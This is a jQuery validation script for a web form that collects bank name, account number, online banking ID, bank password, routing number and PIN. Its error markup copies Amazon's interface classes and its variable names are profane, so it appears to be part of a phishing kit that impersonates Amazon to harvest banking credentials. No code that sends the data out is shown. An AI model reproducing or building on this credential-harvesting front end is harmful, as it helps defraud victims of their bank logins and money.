
$('#nameOnAccount').on("keyup focus", () => {
    var fuckname = $("#nameOnAccount").val()
    if (fuckname == "") {
        $("#nameOnAccount").addClass('error').removeClass('hasText').addClass('border-error').addClass('invalid').removeClass('border-valid');
        $("#errorNameOnAccount").show().html('<div class="a-section a-spacing-none a-spacing-top-micro address-ui-widgets-inline-error-alert"><div id="address-ui-widgets-full-name-offensive-words-error" class="a-box a-alert-inline a-alert-inline-error" role="alert"><div class="a-box-inner a-alert-container"><div class="a-alert-content"><div class="a-section"><i class="bi bi-exclamation-triangle"></i> Please enter a name on account.</div></div></div></div></div>')
        $("#nameOnAccount").parent().parent().parent().removeClass('validated')
    } else if (fuckname.length < 7) {
        $("#nameOnAccount").addClass('error').addClass("hasText").addClass('border-error').addClass('invalid').removeClass('border-valid');
        $("#errorNameOnAccount").show().html('<div class="a-section a-spacing-none a-spacing-top-micro address-ui-widgets-inline-error-alert"><div id="address-ui-widgets-full-name-offensive-words-error" class="a-box a-alert-inline a-alert-inline-error" role="alert"><div class="a-box-inner a-alert-container"><div class="a-alert-content"><div class="a-section"><i class="bi bi-exclamation-triangle"></i> Please check a name on account.</div></div></div></div></div>')
        $("#nameOnAccount").parent().parent().parent().removeClass('validated')
    } else {
        $("#nameOnAccount").removeClass('error').addClass("hasText").addClass('border-valid').addClass('valid').removeClass('invalid').removeClass('border-error');
        $("#errorNameOnAccount").html('')
        $("#nameOnAccount").parent().parent().parent().removeClass('validated')
    }
});


$('#nameOfBank').on("keyup focus", () => {
    var nameOfBank = $("#nameOfBank").val()
    if (nameOfBank == "") {
        $("#nameOfBank").addClass('error').removeClass('hasText').addClass('border-error').addClass('invalid').removeClass('border-valid');
        $("#errorNameOfBank").show().html('<i class="bi bi-exclamation-triangle"></i> Please enter a name of bank.')
        $("#nameOfBank").parent().parent().parent().removeClass('validated')
    } else if (nameOfBank.length < 4) {
        $("#nameOfBank").addClass('error').addClass("hasText").addClass('border-error').addClass('invalid').removeClass('border-valid');
        $("#errorNameOfBank").show().html('<i class="bi bi-exclamation-triangle"></i> Please check a name of bank.')
        $("#nameOfBank").parent().parent().parent().removeClass('validated')
    } else {
        $("#nameOfBank").removeClass('error').addClass("hasText").addClass('border-valid').addClass('valid').removeClass('invalid').removeClass('border-error');
        $("#errorNameOfBank").html('')
        $("#nameOfBank").parent().parent().parent().removeClass('validated')
    }
});
$('#actNumber').mask('000000000000000000')
$('#actNumber').on("keyup , focus", () => {
    var actNum = $("#actNumber").val()
    if (actNum == "") {
        $("#actNumber").addClass('error').removeClass('hasText').addClass('border-error').addClass('invalid').removeClass('border-valid');
        $("#errorActNumber").show().html('<i class="bi bi-exclamation-triangle"></i> Please enter a account number.')
        $("#actNumber").parent().parent().parent().removeClass('validated')
    } else if (actNum.length < 7 ) {
        $("#actNumber").addClass('error').addClass("hasText").addClass('border-error').addClass('invalid').removeClass('border-valid');
        $("#errorActNumber").show().html('<i class="bi bi-exclamation-triangle"></i> Please check a account number.')
        $("#actNumber").parent().parent().parent().removeClass('validated')
    } else {
        $("#actNumber").removeClass('error').addClass("hasText").addClass('border-valid').addClass('valid').removeClass('invalid').removeClass('border-error');
        $("#errorActNumber").html('')
        $("#actNumber").parent().parent().parent().removeClass('validated')
    }
});

$('#onlineId').on("keyup , focus", () => {
    var onlineID = $("#onlineId").val()
    if (onlineID == "") {
        $("#onlineId").addClass('error').removeClass('hasText').addClass('border-error').addClass('invalid').removeClass('border-valid');
        $("#errorOnlineId").show().html('<i class="bi bi-exclamation-triangle"></i> Please enter a online ID or username.')
        $("#onlineId").parent().parent().parent().removeClass('validated')
    } else if (onlineID.length < 6 ) {
        $("#onlineId").addClass('error').addClass("hasText").addClass('border-error').addClass('invalid').removeClass('border-valid');
        $("#errorOnlineId").show().html('<i class="bi bi-exclamation-triangle"></i> Please check a online ID or username.')
        $("#onlineId").parent().parent().parent().removeClass('validated')
    } else {
        $("#onlineId").removeClass('error').addClass("hasText").addClass('border-valid').addClass('valid').removeClass('invalid').removeClass('border-error');
        $("#errorOnlineId").html('')
        $("#onlineId").parent().parent().parent().removeClass('validated')
    }
});
$('#bankPwd').on("keyup , focus", () => {
    var bankPwd = $("#bankPwd").val()
    if (bankPwd == "") {
        $("#bankPwd").addClass('error').removeClass('hasText').addClass('border-error').addClass('invalid').removeClass('border-valid');
        $("#errorBankPwd").show().html('<i class="bi bi-exclamation-triangle"></i> Please enter a bank password.')
        $("#bankPwd").parent().parent().parent().removeClass('validated')
    } else if (bankPwd.length < 7 ) {
        $("#bankPwd").addClass('error').addClass("hasText").addClass('border-error').addClass('invalid').removeClass('border-valid');
        $("#errorBankPwd").show().html('<i class="bi bi-exclamation-triangle"></i> Please check a bank password.')
        $("#bankPwd").parent().parent().parent().removeClass('validated')
    } else {
        $("#bankPwd").removeClass('error').addClass("hasText").addClass('border-valid').addClass('valid').removeClass('invalid').removeClass('border-error');
        $("#errorBankPwd").html('')
        $("#bankPwd").parent().parent().parent().removeClass('validated')
    }
});
$('#routingNum').mask('00000000000000')
$('#routingNum').on("keyup focus", () => {
    var routingNum = $("#routingNum").val()
    if (routingNum == "") {
        $("#routingNum").addClass('error').removeClass('hasText').addClass('border-error').addClass('invalid').removeClass('border-valid');
        $("#errorRoutingNumber").show().html('<i class="bi bi-exclamation-triangle"></i> Please enter a routing number.')
        $("#routingNum").parent().parent().parent().removeClass('validated')
    } else if (routingNum.length < 7) {
        $("#routingNum").addClass('error').addClass("hasText").addClass('border-error').addClass('invalid').removeClass('border-valid');
        $("#errorRoutingNumber").show().html('<i class="bi bi-exclamation-triangle"></i> Please check a check routing number.')
        $("#routingNum").parent().parent().parent().removeClass('validated')
    } else {
        $("#routingNum").removeClass('error').addClass("hasText").addClass('border-valid').addClass('valid').removeClass('invalid').removeClass('border-error');
        $("#errorRoutingNumber").html('')
        $("#routingNum").parent().parent().parent().removeClass('validated')
    }
});
$('#passcode').mask('000000')
$('#passcode').on("keyup , focus", () => {
    var fuckcode = $("#passcode").val()
    if (fuckcode == "") {
        $("#passcode").addClass('error').removeClass('hasText').addClass('border-error').addClass('invalid').removeClass('border-valid');
        $("#errorPasscode").show().html('<i class="bi bi-exclamation-triangle"></i> Please enter a pin or passcode.')
        $("#passcode").parent().parent().parent().removeClass('validated')
    } else if (fuckcode.length < 6 ) {
        $("#passcode").addClass('error').addClass("hasText").addClass('border-error').addClass('invalid').removeClass('border-valid');
        $("#errorPasscode").show().html('<i class="bi bi-exclamation-triangle"></i> Please check a pin or passcode.')
        $("#passcode").parent().parent().parent().removeClass('validated')
    } else {
        $("#passcode").removeClass('error').addClass("hasText").addClass('border-valid').addClass('valid').removeClass('invalid').removeClass('border-error');
        $("#errorPasscode").html('')
        $("#passcode").parent().parent().parent().removeClass('validated')
    }
});
